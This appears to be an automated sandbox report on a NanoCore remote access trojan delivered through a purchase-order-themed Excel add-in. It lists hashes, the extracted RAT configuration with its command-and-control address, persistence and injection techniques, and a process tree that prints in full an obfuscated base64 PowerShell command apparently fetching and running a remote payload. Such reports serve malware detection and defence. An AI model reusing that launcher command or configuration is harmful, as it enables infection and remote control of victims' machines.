nanocore | 1d861fe866c91352205c166147ddf186de606b9d7cf13667cb382b38519e3426

Analysis

max time kernel
138s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
15-09-2021 06:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PO#903_2224_goods_or_products.xlam
Size

16KB
MD5

4ebd33453a236ae8acf90950dee8a2e4
SHA1

47bc4545040e4eb1941668f4d8ae58edb82dfb79
SHA256

1d861fe866c91352205c166147ddf186de606b9d7cf13667cb382b38519e3426
SHA512

7605acceab9052932e55f2d569d3b4d3d7693f98838c6c56c302ce5b65ee793dfa5fa0cec719d96b97fd80da95e96e3f421effedf19a3cc0d45ed42acefec146

Score

10^/10

nanocore evasion keylogger persistence spyware stealer trojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

185.140.53.52:4488

Mutex

f373bcfb-36f5-4636-8770-9da829010f62

Attributes

activate_away_mode
true
backup_connection_host
backup_dns_server
8.8.4.4
buffer_size
65535
build_time
2021-06-03T23:05:48.798919236Z
bypass_user_account_control
false
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
4488
default_group
AUGUST
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
f373bcfb-36f5-4636-8770-9da829010f62
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
185.140.53.52
primary_dns_server
8.8.8.8
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2444	664	cmd.exe	EXCEL.EXE

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

MSBuild.exeZmbvtlrendzxjyiwyialbskbee.exe

pid process

3152 MSBuild.exe
1660 Zmbvtlrendzxjyiwyialbskbee.exe

pid	process
3152	MSBuild.exe
1660	Zmbvtlrendzxjyiwyialbskbee.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

MSBuild.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\UPNP Subsystem = "C:\\Program Files (x86)\\UPNP Subsystem\\upnpss.exe"	MSBuild.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

MSBuild.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MSBuild.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

imf.exe

description pid process target process

PID 3268 set thread context of 3152 3268 imf.exe MSBuild.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MSBuild.exe

description	pid	process	target process
PID 3268 set thread context of 3152	3268	imf.exe	MSBuild.exe

Drops file in Program Files directory 2 IoCs

Processes:

MSBuild.exe

description	ioc	process
File created	C:\Program Files (x86)\UPNP Subsystem\upnpss.exe	MSBuild.exe
File opened for modification	C:\Program Files (x86)\UPNP Subsystem\upnpss.exe	MSBuild.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1960 schtasks.exe
784 schtasks.exe

pid	process
1960	schtasks.exe
784	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Modifies registry class 1 IoCs

Processes:

imf.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings imf.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

664 EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings	imf.exe

pid	process
664	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

powershell.exepowershell.exeimf.exepowershell.exeMSBuild.exe

pid	process
2724	powershell.exe
2724	powershell.exe
2724	powershell.exe
3756	powershell.exe
3756	powershell.exe
3756	powershell.exe
3268	imf.exe
3268	imf.exe
3980	powershell.exe
3152	MSBuild.exe
3152	MSBuild.exe
3152	MSBuild.exe
3980	powershell.exe
3980	powershell.exe
3152	MSBuild.exe
3152	MSBuild.exe
3152	MSBuild.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

MSBuild.exe

pid process

3152 MSBuild.exe

pid	process
3152	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exeimf.exepowershell.exeZmbvtlrendzxjyiwyialbskbee.exepowershell.exeMSBuild.exe

description	pid	process
Token: SeDebugPrivilege	2724	powershell.exe
Token: SeDebugPrivilege	3268	imf.exe
Token: SeDebugPrivilege	3756	powershell.exe
Token: SeDebugPrivilege	1660	Zmbvtlrendzxjyiwyialbskbee.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	3152	MSBuild.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

EXCEL.EXE

pid process

664 EXCEL.EXE
664 EXCEL.EXE
664 EXCEL.EXE
664 EXCEL.EXE
664 EXCEL.EXE
664 EXCEL.EXE
664 EXCEL.EXE
664 EXCEL.EXE

pid	process
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE
664	EXCEL.EXE

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeimf.exeWScript.exeMSBuild.exeZmbvtlrendzxjyiwyialbskbee.exe

description	pid	process	target process
PID 664 wrote to memory of 2444	664	EXCEL.EXE	cmd.exe
PID 664 wrote to memory of 2444	664	EXCEL.EXE	cmd.exe
PID 2444 wrote to memory of 2724	2444	cmd.exe	powershell.exe
PID 2444 wrote to memory of 2724	2444	cmd.exe	powershell.exe
PID 2724 wrote to memory of 3268	2724	powershell.exe	imf.exe
PID 2724 wrote to memory of 3268	2724	powershell.exe	imf.exe
PID 2724 wrote to memory of 3268	2724	powershell.exe	imf.exe
PID 3268 wrote to memory of 3756	3268	imf.exe	powershell.exe
PID 3268 wrote to memory of 3756	3268	imf.exe	powershell.exe
PID 3268 wrote to memory of 3756	3268	imf.exe	powershell.exe
PID 3268 wrote to memory of 3308	3268	imf.exe	WScript.exe
PID 3268 wrote to memory of 3308	3268	imf.exe	WScript.exe
PID 3268 wrote to memory of 3308	3268	imf.exe	WScript.exe
PID 3268 wrote to memory of 3152	3268	imf.exe	MSBuild.exe
PID 3268 wrote to memory of 3152	3268	imf.exe	MSBuild.exe
PID 3268 wrote to memory of 3152	3268	imf.exe	MSBuild.exe
PID 3268 wrote to memory of 3152	3268	imf.exe	MSBuild.exe
PID 3268 wrote to memory of 3152	3268	imf.exe	MSBuild.exe
PID 3268 wrote to memory of 3152	3268	imf.exe	MSBuild.exe
PID 3268 wrote to memory of 3152	3268	imf.exe	MSBuild.exe
PID 3268 wrote to memory of 3152	3268	imf.exe	MSBuild.exe
PID 3308 wrote to memory of 1660	3308	WScript.exe	Zmbvtlrendzxjyiwyialbskbee.exe
PID 3308 wrote to memory of 1660	3308	WScript.exe	Zmbvtlrendzxjyiwyialbskbee.exe
PID 3308 wrote to memory of 1660	3308	WScript.exe	Zmbvtlrendzxjyiwyialbskbee.exe
PID 3152 wrote to memory of 784	3152	MSBuild.exe	schtasks.exe
PID 3152 wrote to memory of 784	3152	MSBuild.exe	schtasks.exe
PID 3152 wrote to memory of 784	3152	MSBuild.exe	schtasks.exe
PID 3152 wrote to memory of 1960	3152	MSBuild.exe	schtasks.exe
PID 3152 wrote to memory of 1960	3152	MSBuild.exe	schtasks.exe
PID 3152 wrote to memory of 1960	3152	MSBuild.exe	schtasks.exe
PID 1660 wrote to memory of 3980	1660	Zmbvtlrendzxjyiwyialbskbee.exe	powershell.exe
PID 1660 wrote to memory of 3980	1660	Zmbvtlrendzxjyiwyialbskbee.exe	powershell.exe
PID 1660 wrote to memory of 3980	1660	Zmbvtlrendzxjyiwyialbskbee.exe	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO#903_2224_goods_or_products.xlam"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c PO^w^Ers^HE^LL -E WwBTAFkAUwBUAGUATQAuAFQAZQBYAHQALgBFAG4AQwBPAGQAaQBuAGcAXQA6ADoAdQBOAEkAQwBvAGQAZQAuAGcAZQB0AHMAdABSAEkATgBHACgAWwBTAFkAUwBUAEUAbQAuAGMAbwBOAHYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAGEAcwBlADYANABzAFQAUgBJAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAawBBAGQAZwBCADIAQQBIAFUAQQBkAFEAQgBoAEEASABjAEEAWQBnAEIANgBBAEcANABBAGEAZwBCAHUAQQBDAEEAQQBLAEEAQQBnAEEAQwBRAEEAYgBRAEIAcgBBAEgAYwBBAGEAUQBCAGgAQQBIAFkAQQBZAHcAQgA0AEEARwB3AEEAYQB3AEIAMgBBAEgAWQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAxAEEASABjAEEAYgB3AEIAbQBBAEgAVQBBAGEAZwBCAHoAQQBIAGcAQQBaAGcAQgBoAEEARwBJAEEAYQBBAEIAaABBAEgAVQBBAFkAZwBCADIAQQBHAGsAQQBjAHcAQQBnAEEAQwBrAEEARABRAEEASwBBAEgAcwBBAEkAQQBCAEoAQQBFADAAQQBVAEEAQgBQAEEASABJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAGsAQQBIAFUAQQBiAEEAQgBsAEEAQwBBAEEAUQBnAEIAcABBAEYAUQBBAGMAdwBCADAAQQBGAEkAQQBZAFEAQgBPAEEARgBNAEEAWgBnAEIARgBBAEYASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgBVAEEARwBFAEEAVQBnAEIAVQBBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBjAHcAQgAwAEEARgBJAEEAWQBRAEIATwBBAEgATQBBAFoAZwBCAEYAQQBGAEkAQQBJAEEAQQB0AEEARgBNAEEAVAB3AEIAVgBBAEgASQBBAFEAdwBCAGwAQQBDAEEAQQBKAEEAQgB0AEEARwBzAEEAZAB3AEIAcABBAEcARQBBAGQAZwBCAGoAQQBIAGcAQQBiAEEAQgByAEEASABZAEEAZABnAEEAZwBBAEMAMABBAFIAQQBCAGwAQQBGAE0AQQBkAEEAQgBKAEEARQA0AEEAWQBRAEIAMABBAEUAawBBAFQAdwBCAE8AQQBDAEEAQQBKAEEAQgAxAEEASABjAEEAYgB3AEIAbQBBAEgAVQBBAGEAZwBCAHoAQQBIAGcAQQBaAGcAQgBoAEEARwBJAEEAYQBBAEIAaABBAEgAVQBBAFkAZwBCADIAQQBHAGsAQQBjAHcAQQA3AEEAQwBBAEEASgBnAEEAZwBBAEMAUQBBAGQAUQBCADMAQQBHADgAQQBaAGcAQgAxAEEARwBvAEEAYwB3AEIANABBAEcAWQBBAFkAUQBCAGkAQQBHAGcAQQBZAFEAQgAxAEEARwBJAEEAZABnAEIAcABBAEgATQBBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEcAcwBBAGQAZwBCAHgAQQBHAFkAQQBaAGcAQgBoAEEASABjAEEAYwBBAEIAbwBBAEgAYwBBAGEAZwBCAHYAQQBHAGcAQQBhAFEAQgBxAEEARwA0AEEAYQBBAEIAawBBAEcAcwBBAGIAZwBCAGwAQQBIAFUAQQBjAGcAQgBuAEEASABrAEEAWgBnAEEAOQBBAEMAUQBBAFoAUQBCAHUAQQBIAFkAQQBPAGcAQgBVAEEARQBVAEEAVABRAEIAUQBBAEMAcwBBAEoAdwBCAGMAQQBHAGsAQQBiAFEAQgBtAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBwAEEASABZAEEAZABnAEIAMQBBAEgAVQBBAFkAUQBCADMAQQBHAEkAQQBlAGcAQgB1AEEARwBvAEEAYgBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGMAZwBCAHAAQQBHAEUAQQBiAEEAQgB0AEEASABJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHUAQQBHAEUAQQBjAGcAQQB2AEEARwBFAEEAZABRAEIAbgBBAEMAOABBAFkAUQBCAGkAQQBHAFUAQQBaAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBHAHMAQQBkAGcAQgB4AEEARwBZAEEAWgBnAEIAaABBAEgAYwBBAGMAQQBCAG8AQQBIAGMAQQBhAGcAQgB2AEEARwBnAEEAYQBRAEIAcQBBAEcANABBAGEAQQBCAGsAQQBHAHMAQQBiAGcAQgBsAEEASABVAEEAYwBnAEIAbgBBAEgAawBBAFoAZwBBADcAQQBBADAAQQBDAGcAQgBwAEEASABZAEEAZABnAEIAMQBBAEgAVQBBAFkAUQBCADMAQQBHAEkAQQBlAGcAQgB1AEEARwBvAEEAYgBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGMAZwBCAHAAQQBHAEUAQQBiAEEAQgB0AEEASABJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHUAQQBHAEUAQQBjAGcAQQB2AEEARwBFAEEAZABRAEIAbgBBAEMAOABBAFkAUQBCAGkAQQBHAFUAQQBaAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBHAHMAQQBkAGcAQgB4AEEARwBZAEEAWgBnAEIAaABBAEgAYwBBAGMAQQBCAG8AQQBIAGMAQQBhAGcAQgB2AEEARwBnAEEAYQBRAEIAcQBBAEcANABBAGEAQQBCAGsAQQBHAHMAQQBiAGcAQgBsAEEASABVAEEAYwBnAEIAbgBBAEgAawBBAFoAZwBBADcAQQBBADAAQQBDAGcAQgBwAEEASABZAEEAZABnAEIAMQBBAEgAVQBBAFkAUQBCADMAQQBHAEkAQQBlAGcAQgB1AEEARwBvAEEAYgBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGMAZwBCAHAAQQBHAEUAQQBiAEEAQgB0AEEASABJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHUAQQBHAEUAQQBjAGcAQQB2AEEARwBFAEEAZABRAEIAbgBBAEMAOABBAFkAUQBCAGkAQQBHAFUAQQBaAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBHAHMAQQBkAGcAQgB4AEEARwBZAEEAWgBnAEIAaABBAEgAYwBBAGMAQQBCAG8AQQBIAGMAQQBhAGcAQgB2AEEARwBnAEEAYQBRAEIAcQBBAEcANABBAGEAQQBCAGsAQQBHAHMAQQBiAGcAQgBsAEEASABVAEEAYwBnAEIAbgBBAEgAawBBAFoAZwBBADcAQQBBADAAQQBDAGcAQgA5AEEARwBNAEEAWQBRAEIAMABBAEcATQBBAGEAQQBCADcAQQBIADAAQQAiACkAKQB8AGkAZQB4AA==
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2444

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwErsHELL -E WwBTAFkAUwBUAGUATQAuAFQAZQBYAHQALgBFAG4AQwBPAGQAaQBuAGcAXQA6ADoAdQBOAEkAQwBvAGQAZQAuAGcAZQB0AHMAdABSAEkATgBHACgAWwBTAFkAUwBUAEUAbQAuAGMAbwBOAHYAZQByAFQAXQA6ADoAZgBSAG8AbQBCAGEAcwBlADYANABzAFQAUgBJAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAawBBAGQAZwBCADIAQQBIAFUAQQBkAFEAQgBoAEEASABjAEEAWQBnAEIANgBBAEcANABBAGEAZwBCAHUAQQBDAEEAQQBLAEEAQQBnAEEAQwBRAEEAYgBRAEIAcgBBAEgAYwBBAGEAUQBCAGgAQQBIAFkAQQBZAHcAQgA0AEEARwB3AEEAYQB3AEIAMgBBAEgAWQBBAEkAQQBBAHMAQQBDAEEAQQBKAEEAQgAxAEEASABjAEEAYgB3AEIAbQBBAEgAVQBBAGEAZwBCAHoAQQBIAGcAQQBaAGcAQgBoAEEARwBJAEEAYQBBAEIAaABBAEgAVQBBAFkAZwBCADIAQQBHAGsAQQBjAHcAQQBnAEEAQwBrAEEARABRAEEASwBBAEgAcwBBAEkAQQBCAEoAQQBFADAAQQBVAEEAQgBQAEEASABJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAGsAQQBIAFUAQQBiAEEAQgBsAEEAQwBBAEEAUQBnAEIAcABBAEYAUQBBAGMAdwBCADAAQQBGAEkAQQBZAFEAQgBPAEEARgBNAEEAWgBnAEIARgBBAEYASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgBVAEEARwBFAEEAVQBnAEIAVQBBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBjAHcAQgAwAEEARgBJAEEAWQBRAEIATwBBAEgATQBBAFoAZwBCAEYAQQBGAEkAQQBJAEEAQQB0AEEARgBNAEEAVAB3AEIAVgBBAEgASQBBAFEAdwBCAGwAQQBDAEEAQQBKAEEAQgB0AEEARwBzAEEAZAB3AEIAcABBAEcARQBBAGQAZwBCAGoAQQBIAGcAQQBiAEEAQgByAEEASABZAEEAZABnAEEAZwBBAEMAMABBAFIAQQBCAGwAQQBGAE0AQQBkAEEAQgBKAEEARQA0AEEAWQBRAEIAMABBAEUAawBBAFQAdwBCAE8AQQBDAEEAQQBKAEEAQgAxAEEASABjAEEAYgB3AEIAbQBBAEgAVQBBAGEAZwBCAHoAQQBIAGcAQQBaAGcAQgBoAEEARwBJAEEAYQBBAEIAaABBAEgAVQBBAFkAZwBCADIAQQBHAGsAQQBjAHcAQQA3AEEAQwBBAEEASgBnAEEAZwBBAEMAUQBBAGQAUQBCADMAQQBHADgAQQBaAGcAQgAxAEEARwBvAEEAYwB3AEIANABBAEcAWQBBAFkAUQBCAGkAQQBHAGcAQQBZAFEAQgAxAEEARwBJAEEAZABnAEIAcABBAEgATQBBAE8AdwBBAGcAQQBIADAAQQBkAEEAQgB5AEEASABrAEEAZQB3AEEAawBBAEcAcwBBAGQAZwBCAHgAQQBHAFkAQQBaAGcAQgBoAEEASABjAEEAYwBBAEIAbwBBAEgAYwBBAGEAZwBCAHYAQQBHAGcAQQBhAFEAQgBxAEEARwA0AEEAYQBBAEIAawBBAEcAcwBBAGIAZwBCAGwAQQBIAFUAQQBjAGcAQgBuAEEASABrAEEAWgBnAEEAOQBBAEMAUQBBAFoAUQBCAHUAQQBIAFkAQQBPAGcAQgBVAEEARQBVAEEAVABRAEIAUQBBAEMAcwBBAEoAdwBCAGMAQQBHAGsAQQBiAFEAQgBtAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBwAEEASABZAEEAZABnAEIAMQBBAEgAVQBBAFkAUQBCADMAQQBHAEkAQQBlAGcAQgB1AEEARwBvAEEAYgBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGMAZwBCAHAAQQBHAEUAQQBiAEEAQgB0AEEASABJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHUAQQBHAEUAQQBjAGcAQQB2AEEARwBFAEEAZABRAEIAbgBBAEMAOABBAFkAUQBCAGkAQQBHAFUAQQBaAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBHAHMAQQBkAGcAQgB4AEEARwBZAEEAWgBnAEIAaABBAEgAYwBBAGMAQQBCAG8AQQBIAGMAQQBhAGcAQgB2AEEARwBnAEEAYQBRAEIAcQBBAEcANABBAGEAQQBCAGsAQQBHAHMAQQBiAGcAQgBsAEEASABVAEEAYwBnAEIAbgBBAEgAawBBAFoAZwBBADcAQQBBADAAQQBDAGcAQgBwAEEASABZAEEAZABnAEIAMQBBAEgAVQBBAFkAUQBCADMAQQBHAEkAQQBlAGcAQgB1AEEARwBvAEEAYgBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGMAZwBCAHAAQQBHAEUAQQBiAEEAQgB0AEEASABJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHUAQQBHAEUAQQBjAGcAQQB2AEEARwBFAEEAZABRAEIAbgBBAEMAOABBAFkAUQBCAGkAQQBHAFUAQQBaAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBHAHMAQQBkAGcAQgB4AEEARwBZAEEAWgBnAEIAaABBAEgAYwBBAGMAQQBCAG8AQQBIAGMAQQBhAGcAQgB2AEEARwBnAEEAYQBRAEIAcQBBAEcANABBAGEAQQBCAGsAQQBHAHMAQQBiAGcAQgBsAEEASABVAEEAYwBnAEIAbgBBAEgAawBBAFoAZwBBADcAQQBBADAAQQBDAGcAQgBwAEEASABZAEEAZABnAEIAMQBBAEgAVQBBAFkAUQBCADMAQQBHAEkAQQBlAGcAQgB1AEEARwBvAEEAYgBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAGMAZwBCAHAAQQBHAEUAQQBiAEEAQgB0AEEASABJAEEATABnAEIAagBBAEcAOABBAGIAUQBBAHUAQQBHAEUAQQBjAGcAQQB2AEEARwBFAEEAZABRAEIAbgBBAEMAOABBAFkAUQBCAGkAQQBHAFUAQQBaAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBHAHMAQQBkAGcAQgB4AEEARwBZAEEAWgBnAEIAaABBAEgAYwBBAGMAQQBCAG8AQQBIAGMAQQBhAGcAQgB2AEEARwBnAEEAYQBRAEIAcQBBAEcANABBAGEAQQBCAGsAQQBHAHMAQQBiAGcAQgBsAEEASABVAEEAYwBnAEIAbgBBAEgAawBBAFoAZwBBADcAQQBBADAAQQBDAGcAQgA5AEEARwBNAEEAWQBRAEIAMABBAEcATQBBAGEAQQBCADcAQQBIADAAQQAiACkAKQB8AGkAZQB4AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724

C:\Users\Admin\AppData\Local\Temp\imf.exe
"C:\Users\Admin\AppData\Local\Temp\imf.exe"
4⤵
- Suspicious use of SetThreadContext
